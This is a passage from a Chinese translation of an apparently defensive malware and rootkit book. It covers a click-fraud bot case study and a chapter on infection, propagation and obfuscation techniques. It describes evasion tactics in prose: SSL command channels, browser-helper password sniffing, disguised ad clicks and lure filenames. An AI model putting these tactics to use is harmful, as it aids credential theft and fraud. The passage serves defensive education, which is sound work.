Bob很聪明,知道许多通过IRC通信的bot程序更容易被发现,所以他购买了一个通过HTTP上的SSL与私人租赁主机通信的bot。使用定制的GET请求,这个bot程序通过向他的Web服务器发送命令和带有具体数据的控制消息来进行交互。由于Bob的bot程序通过HTTP进行通信,所以不用担心所感染的机器上运行的防火墙阻挡bot访问他所租赁的Web服务器,因为大部分防火墙都允许端口443上的出站通信。而且,他也不用担心Web内容过滤,因为传输的数据看上去是无害的。另外,当他打算窃取查看受害者公司集团的PowerPoint幻灯片的财务数据时,只需要将数据加密,这样Web过滤程序就无法看到这些数据。他没有使用大量繁殖的蠕虫来发布他的bot,因此受害者的防病毒软件没有发现这个bot的安装,因为防病毒软件没有这个bot的特征码。 这个bot程序一旦安装,就作为一个浏览器助手对象(Browser Helper Object,BHO)代替Internet Explorer,这使bot程序能访问该公司的所有常规HTTP通信和Internet Explorer的所有功能,例如HTML解析、窗口标题以及访问网页的密码字段。这是Bob的bot程序嗅探发送到公司的信用卡联盟和各种网上银行数据的方法。这个bot开始连接Bob的bot主服务器,并且从服务器上读取已入侵网站的列表,连接到这些网站开始单击广告。 bot程序接收到访问连接列表之后,就会保存这个列表并且等待受害者正常使用Internet Explorer。当受害者浏览CNN.com了解最新的银行援助行动时,bot程序访问列表中的网站寻找可单击的广告。这个bot了解广告网络的工作方式,所以它使用受害者实际查看的网站(例如CNN.com)的引用,使广告的单击看上去像是合法的。这种方法骗过了广告公司的防欺诈软件。bot单击广告并且查看了广告的登录页面之后,就转向列表中的下一个链接。这个bot使用的这种方法使广告公司的服务器中的日志看上去像是一个普通人查看了广告,这降低了Bob的广告账户被标记为欺诈者以及他自己被抓住的可能性。 为了隐藏自己并且尽可能得到更多的收入,Bob让bot程序以较慢的方式在几周内持续单击广告。这能确保受害者不会注意到计算机上额外装入的程序,Bob的bot程序也就不会被发现是个欺诈程序。 Bob成功地使公司的工作站成为自己的提款机,将现金吐到大街上,而他拎着包去捡这些钱。 Bob采用的其他隐身技术确保他的bot服务器用于查找实际数据的搜索引擎不会发现他的欺诈。为了避开检测,bot使用了各种搜索引擎(如Google、Yahoo、AskJeeves等)来实现欺诈。在欺诈方案中使用越多搜索引擎,Bob就能赚越多的钱。 Bob需要使用搜索引擎,因为这是欺诈的渠道。所单击的广告是前几个星期Bob侵入的网站上所放置的。在侵入的网站上所单击的广告只有10%来自Google,其余的来自其他来源,包括其他的搜索引擎。bot程序采用一种随机单击算法,这种算法只在半数时间中单击广告链接,使得搜索引擎公司更难发现。 使用慢速的方法并不意味着Bob需要花费很长的时间赚钱。例如,仅仅使用Google,我们假设Bob的秘密传播(例如,慢慢地传播)恶意软件感染10 000台机器;每台机器最多单击20个广告,而只在50%的时间内单击Google广告,一共单击100 000次。让我们假设Bob显示的广告每个单击产生0.5美元收入。使用这种方法,攻击者得到50 000美元收入(10 000×20×50%×$.50)。对于两周的时间来说,这项工作的价值很不错。 现在我们理解了Bob的动机和计划攻击的方法,让我们回到这个虚构的公司,分析他们如何处理恶意软件的爆发。因为Bob希望保持隐蔽,所以这个恶意软件一经运行,就通过HTTP上的SSL向中心服务器报告,并且请求和发送该公司员工输入到网站的所有用户名和密码的副本。因为Bob使用一个BHO构建bot,不管网站的密码是否加密都能捕获。包括员工的信用卡联盟和网上电子商务供应商(如eBay和Amazon.com)都记录下来,并且发送给Bob租赁的服务器。由于到租赁服务器的通信都通过HTTP上的SSL进行,这个网站不会被公司的代理服务器标记为恶意网站,也不会受到阻塞。 周三上午8点,恶意软件通过将自身发送给接收到相同的CEO信息的主管的企业地址簿上的所有用户而传播。通过利用未打补丁的机器以及IT部门尚未来得及更新的运行旧版本Microsoft Windows的机器上的网络漏洞,这个恶意软件开始感染其他机器。为什么CIO不批准网络安全团队去年提出购买和实施的补丁管理的计划呢? 周三下午4点,现在已经有几百名员工的电脑受到感染,但是IT部门也听到了需要安装电子邮件上的应用程序的消息,于是开始调查。IT部门发现这一文件可能是恶意软件,但是企业防病毒软件和电子邮件防病毒软件不能检测,所以还不能确定这个可执行文件是什么。IT部门对于这个执行程序是否恶意、程序的意图或者恶意软件的操作情况没有任何信息,他们相信安全软件供应商,将样本发送给防病毒软件供应商进行分析。 周四上午10点,IT部门急急忙忙地开始试图使用防病毒供应商前一晚上发送的特殊特征码删除这个病毒。这是个猫捉老鼠的游戏,IT部门很少能够在病毒蔓延之前采取行动。IT部门在前一个晚上关闭公司的所有工作站,包括那些架设在伦敦的、该制造公司必需的订单处理机,这使客户很不高兴。 周四晚上8点,IT部门仍然在试图为工作站杀毒。一位IT工作人员开始自己进行分析,并且发现这段二进制代码可能是一位过去的员工编写的,因为二进制代码中的一些字符串引用了前任CIO和IT部门负责人之间的一次争吵。IT部门联络FBI确定这是不是一次犯罪行动。 周五上午9点,季度会议按照计划应该开始,但是因为CEO用来作报告的机器也受到感染,在IT部门推出新的防病毒软件更新时该机器关闭着,导致病毒尚未被清除,所以会议只能推迟。CEO要求和CIO进行一次紧急会议以确定发生了什么事情。IT部门继续进行网络杀毒并且稳步推进工作。 周六上午11点,IT部门认为已经从网络上完全删除了这个恶意软件。员工们在周一将能够正常工作,但是IT部门仍然有很多工作需要做,病毒感染造成了严重的破坏,致使30台工作站必须重建,因为恶意软件还没有完全地从每台工作站上删除。 下周一下午3点,CIO与CEO会谈,给出了清除这一问题所要花费的成本估算。他们都无法弄清,实际损失的销售额或者受到影响无法正常工作的1500个工人的产出。而且,CIO告诉CEO,由于恶意软件在他们登录网上银行账户时记录击键,所以他们的身份被窃取了。这些受害的员工希望知道公司所能对他们提供的帮助。 上面这样的情况并不少见。每个案例的技术细节可能不一样,但是周一CIO和CEO的会谈内容很相似。这个制造机构中没有人预见到这种情况,但是商业杂志和每份安全报告都提到过这是难以避免的。这个案例中的主要问题是这个公司没有准备。和战争中一样,知识是成功的一半,而大部分的组织都不了解恶意软件,不了解这些软件是如何编写的,又是为什么编写的,这些组织都没有合适的策略和程序来处理bot的全面爆发。因此,在2008年,Symantec的互联网威胁报告称,一个组织因为恶意软件而产生的第二大成本是从网络删除bot程序所花费的成本。在我们的案例研究中,IT用于恢复业务运行所花费的总时间很长,而且还不包括所有因为恶意软件捕捉个人身份信息所引起的可能的通知、违规或者法律成本。 第1章 传染方法 当今的网络威胁比以往都更具敌意。在仿冒和垃圾邮件方面取得的新进展说明,攻击者的方法已经更趋向于心理学方面而非技术方面。现在,通过电子邮件和Web,用户成为了目标,仿冒网站看上去如此可信,使得许多人没办法看出与真实网站的不同,从而交出自己的敏感信息,例如网上银行的用户名和密码。根据McAfee的网站指南,在他们所做的间谍软件调查问卷(测试中询问受访人一个网站是否安全)中,12万名受访者中的95%错误地认为一个含有恶意软件的网站是安全的。McAfee的调查问卷是用户所面对的问题的绝好实例,他们必须一眼就能看出某些网络内容是否会对自己的机器带来负面的影响。考虑到安全意识的缺失,这个重要的决定类似于让一个4岁的孩子确定他的父亲是不是真的能从耳朵里拿出一个25美分的硬币。一旦攻击者哄骗用户下载了恶意软件,就能够随意地访问网络空间的最新边界——你的工作站,获取机密信息、用户名和密码,还有类似社会保险号码或者银行账户信息等个人身份信息。 你最后一次从当地报纸中了解到严重的病毒爆发是什么时候?两年前?病毒已经成为过去。从2004年Bagle和Netsky病毒爆发以来,蠕虫和病毒对个人用户和公司网络的威胁已经显著减少了。但是,病毒爆发的停止不是因为病毒编写者决定洗手不干,而是因为他们的主要目标——公众注意力,已经不再让他们感兴趣了。病毒编写者想要更多,比如金钱、敏感信息,以及对未授权系统的持续访问以利用这些系统资源,因此他们改变了方法、技术和工具,变得更加谨慎和针对特定目标,以适应新的动机,于是恶意软件和Rootkit的时代开始了。 恶意软件制作者的一些改变是由于安全界提升了安全军备竞赛的水平。未经证明的Microsoft操作系统远程漏洞的减少和边界安全产品的广泛使用迫使攻击者提升自己的水平。 1.1 这种安全设施可能确实有用 安全工具和产品一般被看作是降低生产率和浪费资源,或者没有真正的投资回报的东西,但是因为安全是“策略”所以必须实施。许多安全产品本身没有提供价值,而且生产软件的公司的最新改进已经显著减少了漏洞的数量和类型。攻击者利用核心操作系统部件缓冲区溢出来获得远程管理权限的时代一去不复返了。现在的漏洞远比过去复杂,在代码中隐藏得很深,要找到它需要更多的技巧,而且发布的频率也比过去要低得多;发现这些漏洞需要攻击者花费更多的时间。 攻击者花费时间开发漏洞检查工具(fuzzer)和内存分析器这样的工具,用于在补丁这样的新软件发布版本公开发行时寻找漏洞。这种类型的投资需要研究经费或者大量空闲的时间,这就是许多漏洞由McAfee、iDefense和TippingPoint这样的公司发现的原因,这些公司向开发人员而不是独立的个人支付薪水,以寻找新的漏洞。 恶意软件的作者不试图寻找“零日”攻击来传播恶意软件;恰恰相反,他们只是让用户相信安装的恶意软件是合法的,或者等待软件供应商发布补丁,然后对补丁进行逆向工程以开发利用程序。因为许多用户在官方补丁发布了许多天、几个月甚至好几年之后都不进行修补,所以恶意软件作者有很多的时间发布更多的恶意软件变种,感染更多的用户。 1.1.1 操作系统漏洞的减少 金钱和数据不是从病毒和蠕虫转向更复杂的恶意软件和Rootkit的唯一动机。2005年以来,攻击者能够远程利用的Microsoft Windows操作系统漏洞数量急剧下降,如图1-1所示。 图 1-1 2005~2008年影响客户端应用程序的高危漏洞 而且,作为世界上最大的操作系统供应商,Microsoft在其安全过程上有了巨大的进步,根据2009年IBM X-force报告(见图1-2),Windows在最脆弱系统排名中已经下降到第5位。 安全研究团体的趋势已经转为研究客户端程序漏洞,比如通过装入恶意网页而受到侵害的Web浏览器,或者当用户打开和解释Office文档时Microsoft Office所导致的入侵。Microsoft不是唯一的试图寻找自身桌面产品漏洞的供应商。像Adobe和Skype这样的公司也设立了这样的目标。这种趋势的转变有许多原因,部分原因是安全研究人员已经花费20多年时间来分析在用操作系统的漏洞,操作系统中的漏洞越来越少,研究人员希望探索具有新挑战的新边界。 图 1-2 2008年最脆弱的操作系统 1.1.2 边界安全 从1999年Melissa病毒爆发以来,边界安全(perimeter security)技术已经得到了惊人的发展。1999年,大部分组织仍然苦于防火墙的部署,而许多已经部署了防火墙的组织苦于防火墙的正确配置。随着越来越多的企业和家庭用户意识到病毒和蠕虫必须连接到脆弱的服务器或者系统才能进行攻击,人们开始利用边界安全产品。 防火墙作为第一种边界安全产品,成为所有存在互联网连接的网络的组织的常规配备,目前它仍然是许多可访问互联网的网络的必备设施。对于家庭网络,Microsoft的XP Service Pack 2包含了一个基本的防火墙,也能帮助一些家庭用户阻挡攻击,但是其作用有限。实施防火墙限制了与未授权的外部设备通信的服务,从而显著地减少了蠕虫用于进入网络的弱点。 许多组织开始为分支机构添加更高速度的互联网连接,代替慢速而昂贵的ATM连接,而且,这些组织不希望在每个分支机构购买或者管理复杂的防火墙,因此虚拟专用网络(Virtual Private Networks,VPN)成熟起来,变得更容易管理,从而开始更多地部署。拥有到集团网络的VPN使公司可以拒绝来自安全和得到验证的VPN之外的数据进出集团办公室。这种网络设计进一步减少了病毒和蠕虫通过互联网接触到的脆弱工作站和服务器的数量。 促进大众注意的病毒和蠕虫向窃取数据的恶意软件转化的最后一种技术是入侵检测系统(IDS)和入侵防御系统(IPS)。许多用户相信防病毒技术是病毒和蠕虫问题的唯一解决方案。但是,IDS和IPS采用了防病毒系统中的技术——特征码,并将它应用到网络边界上的网络层。这种变化避免病毒和蠕虫进入工作站。而且,这些系统为不能深入检查数据的防火墙提供了另一条防线。例如,如果红色代码(Code Red)这样的蠕虫通过IIS的80端口发起攻击,防火墙将不进行检查而放行,而IPS将能够避免这种蠕虫穿越80端口进入服务器。 随着可利用的漏洞的减少和更多边界安全设备防止到机器的远程访问,病毒的传播又回到久经考验的传播方法——电子邮件和Web。 1.2 为什么他们想要你的工作站 技术进步和攻击的有效性是攻击者改变方法的因素,但是他们的目标——你最终为他们做出了决定。恶意软件和Rootkit的作者意识到他们能够利用所创建的恶意软件窃取敏感数据(如你的网上银行用户名和密码),实施单击欺诈,将受感染的工作站的远程控制权卖给垃圾邮件制造者作为垃圾邮件中继站,这些都能为他们带来收入。恶意软件作者可能从花费在编写恶意软件的时间上得到确实的回报。你的工作站现在比以前更有价值;因此,攻击者的工具需要适应保持对受感染工作站的控制,并且尽可能地传染更多的工作站。 家庭用户不是恶意软件作者的唯一目标。集团公司的工作站同样有趣和诱人。企业工作站用户通常在本地工作站上保存集团公司机密文档,登录个人账户(如银行账户),登录到包含集团公司知识产权的服务器。所有这些都是攻击者感兴趣的,一般也是恶意软件感染中所收集的内容。“企业”目标的最近实例是巴拉克·奥巴马和约翰·麦凯恩之间的美国总统竞选。两个候选人的竞选活动系统都受到远程攻击者的攻击和渗透。我们只能猜想这些攻击者想要的信息类型,但是他们已经访问到的数据如果公开,可能对竞选活动造成严重的损害。即使一些看上去好像没有用的信息也常常被窃取、出卖或者散布。可能出现在工作场所的个人照片、秘密的风流韵事以及电子邮件也是目标。 1.3 难以发现的意图 局面的改变加强了恶意软件作者在技术上的挑战性,但是最大的变化是意图的变化。前面已经提到,许多病毒作者编写病毒纯粹是为了自我满足和向朋友炫耀。病毒编写者是以新技术或者大规模破坏为乐的地下组织的一部分。对“最能干的病毒创作者”称号的角逐致使许多病毒制作者将所创建的程序封装起来并发布,导致了更大的危害。这种行为就像许多糟糕的电影里的情节,两个男孩子在争夺一位高中女生时不断地试图超越对方,等他们清醒过来时,所留下的只是破坏。最终,两个男孩都不能得到那个女孩,并且因为自己的愚蠢而待在牢里。发布病毒正与此相同,在许多国家,编写病毒是违法的,这些病毒制作者被捕并且受到起诉。 有些病毒制作者不是为了自我满足而是为了抗议,比如Onel A.De Guzman的案子。De Guzman就像是菲律宾的罗宾汉。他编写了“我爱你”病毒的一部分,这个病毒窃取人们用于访问互联网的账户和密码,并把这些信息提供给其他人使用。在菲律宾,互联网访问资费每月高达90美元,许多人将他的病毒看做很大的利益。除了De Guzman,保加利亚的病毒制作者Dark Avenger因为声称“这些病毒给了他在保加利亚所不能得到的政治权力和自由”而闻名。恶意软件和Rootkit不是为了自我满足或者抗议,它们的目的是金钱。 恶意软件制作者想要钱,最容易的方法就是从你那里偷。他们编写程序的意图已经有了根本的改变。恶意软件和Rootkit现在是精密的盗窃工具,而不是夸耀自己和向朋友宣扬的广告牌。为什么这种转变很重要呢? 恶意软件制作者意图的转变向保护用户免遭恶意软件侵害的人们传递了一个信号,他们必须改变自己的检测和预防能力。病毒和蠕虫在技术上是异常现象,一般来说,它们的功能不是由普通用户可能运行的常见功能集(比如字处理)组成的;因此,发现和防御这种异常现象要比发现一个用户进行某种恶意行为更容易。发现恶意行为的问题在于谁来定义恶意行为,是防病毒公司还是媒体?不同的计算机用户有不同的风险容忍度,一个人可能容忍一个恶意软件运行以获得它能够提供的好处(我们稍后将了解恶意软件所带来的好处),而其他人可能不能忍受任何恶意软件。 理解一个合法用户行为的意图并非不可能,但是很难。世界各地的政府多年来试图在执法和立法范围内理解人类行为的意图,但是收效甚微。大部分遵循盎格鲁-撒克逊法律体系的国家(比如美国)中的定罪率在40%~80%。如果在世界上存在了几百年的法律系统都很难确定人们的意图,那么我们又有多少机会去阻止恶意软件?我们相信自己能够做到,但是在网络世界中,我们所面对的是前所未有的战斗,这就是本书的其余部分关注于让你掌握恶意软件传播、传染、保持控制和窃取数据的技术知识的原因,掌握了这些信息,你将能够确定运行在你的工作站上的应用程序的意图,并且迈出保护你的网络免遭恶意软件侵害的第一步。 1.4 这是桩生意 前面已经提到,恶意软件制作者关注于获得利益。和所有希望赚钱的企业家一样,他们启动各种利用形式的商业活动。最大和最活跃的恶意软件集团是俄罗斯商业网络(Russian Business Network,RBN)。俄罗斯的恶意软件已经兴起多年,许多最著名的病毒和特洛伊木马(如Bagle、MyDoom和Netsky)均出自俄罗斯开发人员之手。 在深入研究RBN的业务之前,让我们先来研究一下这个组织。RBN是一个高伸缩性、冗余而有效的宿主平台,只是偶然地作为恶意软件的宿主,它的主机客户包括赌博、恶意软件和仿冒站点。只要能得到收入,RBN不在意这个主机平台被用于什么目的。 RBN的工作主要面向6个领域: ·仿冒 ·恶意软件 ·诈骗 ·分布式拒绝服务攻击(DDoS) ·色情(包括儿童色情) ·游戏 为了支持这些工作,RBN已经建立和部署一个由主要的需求——带宽组成的主机平台,并且持续地部署恶意的Web服务器、僵尸网络和指挥控制服务器。 2005年RBN开始被看做恶意软件的散布者,当时人们发现CoolWebSearch恶意软件正在由RBN地址空间上的服务器散布。RBN通过使用利用程序(例如2006年中的Microsoft VRML利用程序)来散布和聚集恶意软件。RBN在匿名用户攻击中使用了各种利用和恶意软件,但是留下的痕迹仍然很少。 从2007年开始,随着MPack攻击工具包的发行,RBN开始真正地影响恶意软件市场。尽管MPack实际上可能不是由RBN编写的,但是作者是俄罗斯人,而且许多原始的MPack安装版本,比如著名的恶意软件攻击载荷Torpig,都可以追溯到RBN网络。MPack以500~1000美元的价格销售给攻击者,额外花费300美元还可以包含一个装入程序,帮助开始恶意活动。MPack是RBN走出的重要一步,它包含了10种不同的利用程序,攻击者可以根据所连接的目标选择不同的利用程序。MPack非常高效,并且给了RBN所不曾拥有的东西——性能度量。因为MPack包含了多个利用程序,管理面板详细列出了曾经最成功感染的Web浏览器,该浏览器来自于哪个国家,以及感染率。这些度量使攻击者能够微调他们的攻击,或者根据库存销售特定类型的受感染机器。 RBN持续着狂热的传染,它似乎是印度银行事故的背后黑手,在这次事故中,印度银行的网站散布来自于RBN网络的恶意软件。令人惊讶的是,印度银行网站试图在客户计算机上安装超过20种不同类型的恶意软件。RBN现在在恶意软件散布量上绝对处于领先! 恶意软件的散布是RBN最主要的活动,而网络仿冒紧随其后。大量关于RBN的虚假信息的存在使得人们很难将该网络和具体的仿冒攻击直接联系起来;但是,大量数据显示,RBN网络已经聚集了许多银行业的特洛伊木马和其他能够绕开防病毒软件的服务、仿冒内容网页,并且已经成为了已安装的木马程序发送记录的目的地。 RBN和许多企业一样,已经启动了接受信用卡付款的零售网站,出售虚假的杀毒软件并且已经成为传统黑客们的伙伴,以加快其Web服务器提供恶意流量的脚步。 利用RBN雄厚的组织和基础架构,其所有活动的年收入预计在12亿美元左右。从这样的收入,你可以了解到攻击者从拥有服务器转向拥有身份信息的目的。 1.5 重要的恶意软件传播技术 传统上,恶意软件攻击像Microsoft Windows、Linux、Mac OS、Microsoft Office这样的平台和应用程序,以及许多第三方应用程序。有些恶意软件甚至由制造商不知不觉地散布,并且直接嵌入安装光盘上直到几个月后才被发现,这种现象在2008年仍有发生。20世纪90年代两种最流行的传播方式是通过电子邮件和直接文件执行。现在对你们来说这似乎已经不重要,但讲述几次恶意软件的爆发仍然很重要。最重要的是需要理解过去10年中技术的革新和现在常见的技术,并且了解这些方法的起源。我还希望阐明,“熟悉而可靠”的技术仍然和10年前一样管用。安全界通过从使他们遭受挫败的传播技术那里学习到的经验,并发展到今天的水平,但是现在仍然面对着与基于这些技术的攻击斗争和防御的挑战。最后,对于那些刚刚进入这个行业、对这些恶意软件发布认识尚未成熟的读者来说,这是对恶意软件传播技术的一个简单概括。 1.5.1 社会工程 历史上,通过网络分发和传播恶意软件的最古老但仍然最有效的方法是侵犯人类的信任关系。社会工程(social engineering)包括编造一个故事,然后将这个故事传递给受害人,希望受害人相信这个故事并且采取想定的步骤以便执行恶意软件。一般来说,尽管有时候这种分发方法或者故事所用的“虚假事实”非常肤浅,但是用户没有意识到实际发生的传染。有时候用户感觉到有些问题,或者某个事件引起用户的怀疑,经过简单的检查,用户发现了整个阴谋。接着,企业安全团队试图删除恶意软件并且防止通过网络的传播。没有社会工程,如果今天的几乎所有恶意软件都无法感染系统,我也就不会和同伴们合著这本书了。下图是一些编造“虚假事实”、希望我单击而被感染或者提供个人信息的恶意屏幕。 下面的简短列表列出了一些模棱两可的文件名,恶意软件编写者用它们诱使那些未起疑心的社会工程受害者打开它,从而开始传染过程: ·ACDSee 9.exe ·Adobe Photoshop 9 full.exe ·Ahead Nero 7.exe ·Matrix 3 Revolution English Subtitles.exe ·Microsoft Office 2003 Crack,Working!.exe ·Microsoft Windows XP,WinXP Crack,working Keygen.exe ·Porno Screensaver.scr ·Serials.txt.exe ·WinAmp 6 New!.exe ·Windows Sourcecode update.doc.exe 1.5.2 文件执行 事实上,文件执行是恶意软件传染的最直接方法。用户单击重命名或者嵌入在另一个文件中(例如可执行文件、Microsoft Office文档、Adobe PDF或者压缩文件)的文件。该文件可以通过刚才讨论的社会工程技术或者通过对等(P2P)网络、企业网络文件共享、电子邮件或者非易失性存储设备传递。现在,某些恶意软件能够以可下载的flash游戏的方式传递,在你享受游戏的同时,在后台你的系统已经成为某人的诡计(如StormWorm)的受害者。你所遇到的某些感染只是来自于一个简单的平面设计动画、跳舞熊的PowerPoint幻灯片、甚至一篇爱国主义的故事。这种传播技术——文件执行是所有恶意软件的基础。本质上,如果你不执行恶意软件,那么它就无法感染你的系统。表1-1列出了通过文件执行传递恶意软件的各种基于Windows文件类型的简单实例,图1-3说明最常用于电子邮件的文件类型。 恶意软件的祖先采用的方法是奇特的,而且多半经过精心的思考,并且造成的破坏至多是毁坏计算机本身。这些攻击者更关注于通过发表概念性的代码表现自我和独创性,他们所发表的恶意软件在实现上有多种弱点,例如容易识别的二进制代码、系统入口以及容易发现的传播技术。他们的方法使安全专家在夜里惊醒,提心吊胆地等待着更好的防病毒引擎和网络入侵检测系统开发出来。图1-4提供了入侵检测系统生命周期的时间轴,在20世纪90年代末和21世纪初,这是识别通过网络传播的恶意软件的最佳工具。 图 1-3 最常见的电子邮件文件类型 图 1-4 入侵检测系统时间轴 表1-2揭示了最臭名昭著的早期恶意软件攻击所使用的传播技术。 [1]松弛空间(slack space)——每个分配单元中没有用完的部分空间。——译者注 1.6 现代恶意软件的传播技术 由于网络应用程序、网络服务和操作系统功能中具有创造力的进步,对于IDS来说,发现恶意软件的传播已经比以前困难得多了。IDS特征码已经被证明在对抗恶意软件的新版本或者多态的恶意软件时没有什么帮助。在21世纪初,出现了全新的传播技术,这些技术起源于从过去的恶意软件爆发时学习到的经验。 恶意软件已经发展到如此高的水平,以致我们现在只能依赖专家来预测可能出现的恶意软件爆发事件,或者旧的技术在什么地方采用创新的方法造成比过去更大的破坏。新的技术利用操作系统和应用程序的系统改进和功能升级来对付最终用户。表1-3列出了恶意软件传播方法的一些最新进展。 表1-3中描述的蠕虫使用了新的传染和传播方法并且成为近期IT界重要的恶意软件爆发的根源。Downadup蠕虫在不到5天的时间内感染了超过900万台计算机。评估恶意病毒的开发非常重要——从对付组织的针对性恶意软件到执行恶意代码远程控制受害计算机的简单客户端利用程序。尽管在刊物和每个人阅读的报纸上报道的几乎所有流行的实例都是以Microsoft Windows为焦点的恶意软件,但确定所有恶意软件的数量仍然很关键。 在恶意软件最初发展阶段使用的技术在当今的恶意软件版本中仍然概念性地存在。由于网络的进步以及简化网络管理员日常任务和职责的路由服务的开发,这些技术造成的损害比过去更大了。 在21世纪来临的时刻,恶意软件制作者也开始使用让取证分析师和网络防御专家更加难以识别和缓解的技术。历史上,这些方法包括了从传统的简单方法到使世界上的许多管理员感到头疼的具有很强的独创性的方法。在下面的部分中,我将讨论一次最大的恶意软件爆发事件,然后描述其他的恶意软件实例及其功能性。 注意:你可在本书的伙伴网站上下载并且打开IDA Pro映像用于个人研究和教育用途。每个阶段,我们将告诉你应该打开哪个映像阅读,以识别所讨论的技术并且用一个健壮的分析工具分析所提出的恶意软件实例。我们建议使用IDA Pro工具,你可以从http://www.hex-rays.com/idapro/下载它,免费的试用版本能够对读者可在本书网站上取得的实例进行只读访问。 2007年,我们有幸遇到了到目前为止最难以捉摸,最具有说服力表现的一种蠕虫,在2008年中期,这种蠕虫仍然活跃,只是因为业界开发了多种对抗措施才使得它的新变种难以很快出现。 1.6.1 StormWorm(恶意软件实例:trojan.peacomm) StormWorm是一个邮件蠕虫,采用社会工程,在来自可信朋友的邮件中附加二进制文件或者在Microsoft Office附件中嵌入恶意代码,然后对Microsoft Internet Explorer和Microsoft Office(具体版本是2003和2007)的脆弱版本发动大家熟悉的客户端攻击。StormWorm是一种影响使用Microsoft操作系统的对等僵尸网络框架和后门特洛伊木马,在2007年1月17日最早发现。StormWorm培育了一个对等僵尸场网络(botnet farm network),这是一种更新的控制指挥技术,用来确保集群的持续性,并且增强了它的控制指挥中心的生存能力,因为在这里没有单独的中央控制点。每台被侵害的机器连接到整个僵尸网络集群的一个子集,包括25~50台其他受侵害的机器。在图1-5中,你可以看到StormWorm的控制指挥结构的效率——这是它难以防范和跟踪的主要原因之一。 图 1-5 按国家分布的StormWorm感染情况 在对等僵尸网络中,没有一台机器拥有整个网络的完整列表;每台机器只有总表的一个子集,这些子集中含有重叠的机器,分布得像一个错综复杂的蜘蛛网,使得这个邪恶的网络的范围难以确定。StormWorm的大小从未被精确计算过,但是,估计它是有史以来最大的僵尸网络,可能包含100万~1000万个受害系统。StormWorm如此巨大,以至于在其运作者发现多家国际安全集团积极与这一僵尸网络战斗并试图拆除它时,向这些安全集团发动了攻击。由于这一国际性僵尸网络的强大力量,国际性的安全集团和机构遭到了挫败。 感染时,StormWorm将安装Win32.Agent.dh,这不可避免地导致制作者实现的第一个变种的垮台。有些安全集团感到,这个缺陷可能是一个未知实体的一种预先测试或者武器测试,因为实际的宿主代码带有在某些初始的二进制代码分析时就可以避免的缺陷。记住,有很多方法能够用来确保恶意软件难以发现,这些方法包括变形、多态以及从操作系统最难发现的基于硬件的设备感染。到今天为止,没有人知道这个缺陷到底是不是有意为之,因为分析师们试图更好地理解StormWorm的方法以及背后的意图,所以这一点仍然在安全界中继续讨论。如果这个蠕虫确实计划在全球流行,它的作者可能已经花费更多的时间采用一些更加复杂的技术来确保这个Rootkit更加难以被发现,或者持久地留在受害的主机上。 1.6.2 变形(恶意软件实例:W32.Evol、W32.Simile) 变形(metamorphism)的恶意软件在复制或者传播时发生改变,使得基于特征码的防病毒或者恶意软件删除工具难以识别它。每个变种与原型稍有不同,足以使其生存足够长的时间来传播到其他系统中。变形高度依赖于用于创建变种的算法。如果没有合适的变形算法,就可以采取措施来枚举变形引擎可能出现的重复。下图说明了变形引擎每次重复时如何改变,使变种恰好足够改变其特征码,避免被发现。 变形引擎不是新生事物,已经使用超过10年了。在一台计算机上对恶意软件进行变异的方法已经得以改进,使得全面清除感染甚至发现恶意软件都非常困难。接下来是一些采用变形的臭名昭著的恶意软件的实例。 多态(恶意软件实例:W32.Rahack.h、W32.Polip、W32.Dengue) 多态(polymorphism)是指采用与原型不同的结构进行自我复制的恶意软件。多态是一种伪装方式,最初被恶意软件编写者用于挫败采用简单字符串搜索以发现主机上恶意软件的防病毒引擎。防病毒公司很快就对这种方法做出反击,但是作为多态核心的加密过程不断地发展,确保了恶意软件具备在安全的主机上的生存能力。下图展示了多态引擎采用的一种典型过程。你可以看到,病毒的每次重复都完全不同。这种技术使防病毒软件更加难以发现恶意软件的重复。第7章中将会介绍,防病毒引擎多半依靠查找恶意软件的基本静态代码来发现它,有些时候,也使用行为特征判断方法,试图识别新添加的文件的行为是否类似恶意软件。 寡形(恶意软件实例:W95.Sma) 这种抗检测技术一般被认为是穷人的多态引擎。这种方法从一组预定义的备选方案中选择一个解密程序。也就是说,这些预定义的备选方案可能用一组有限的解密程序集识别和发现。下图中,你可以看到寡形引擎的局限性以及在病毒实际投入使用时的效率。 1.6.3 混淆 大部分日常所见的恶意软件都以许多方法进行混淆。最常见的混淆方式是通过压缩或者加密打包代码,这些将在后面的内容中介绍。但是,代码混淆的概念对现在的恶意软件是非常重要的。主机混淆和网络混淆是两种重要的混淆类型,用于同时绕过两种类型的保护措施。 混淆有时候可能是恶意软件崩溃的原因。例如,恶意软件编写者实施了非常剧烈的混淆方法,以至于网络防御者实际上可以使用逃避的技术来创建检测这个恶意软件的特征码。在接下来的内容中,我们打算讨论两种最重要的恶意软件混淆组件:可移植执行体(portable executable,PE)打包程序和网络编码。 存档程序、加密程序和打包程序 许多用来保护数据和确保完整性的公用程序也能成功地用于在恶意软件传播时对其进行保护,最重要的是能帮助其避开取证分析。让我们按照变化的顺序,也即存档程序、加密程序和打包程序的顺序来研究一下这些公用程序在感染系统中的使用方法。 存档程序 在20世纪90年代末,ZIP、RAR、CAB和TAR实用程序被用来混淆恶意病毒。为了运行存档程序,必须将其安装在受害主机上,除非恶意软件编写者将这个程序作为装载程序的一部分。这种方法后来很少使用,因为要使恶意病毒运行,就必须解压缩,然后将其移到硬盘上的某个位置,这很容易被防病毒引擎发现并删除。此外,现在的大部分防病毒引擎深入扫描存档文件,以搜索嵌入的执行程序。这种方法有些过时,并且没有得到广泛的使用,原因主要是防病毒扫描程序的成熟及其深入扫描存档文件的能力。 加密程序(恶意软件实例:W32.Beagle@mm!enc) 通常大部分软件开发人员用这些程序来保护应用程序的核心代码。这些核心代码被加密并压缩,使得黑客很难进行逆向工程或者识别应用程序中的函数。实用加密学(Cryptovirology)与对恶意软件用来混淆和保护自己以得到长期生存能力的加密过程的研究有相同的意义。历史上,恶意软件实施共享密钥(对称)加密方法,但是一旦数字取证业界识别出这种方法,很容易将其倒推出来,这促进了当前实施的公钥加密。 打包程序(恶意软件实例:W32.Beagle@mm!enc) 现在,几乎所有恶意软件实例都以某种方式采用打包程序,以绕过防病毒或者防间谍工具这些安全软件。简单地说,打包程序是一个用于混淆执行恶意病毒功能的主体代码的加密模块,用于在传输时避开网络检测工具以及基于主机的保护产品。现在的互联网上有数十个可用的公开或者不公开的打包程序。不公开的一次性打包程序最难发现,因为它们没有公开,企业安全型产品不能很容易地识别它们。打包程序和存档工具有明显的不同,普通计算机用户一般不采用这些工具。打包程序一般保护可执行程序和DLL,不需要在受害主机上预先安装任何工具。 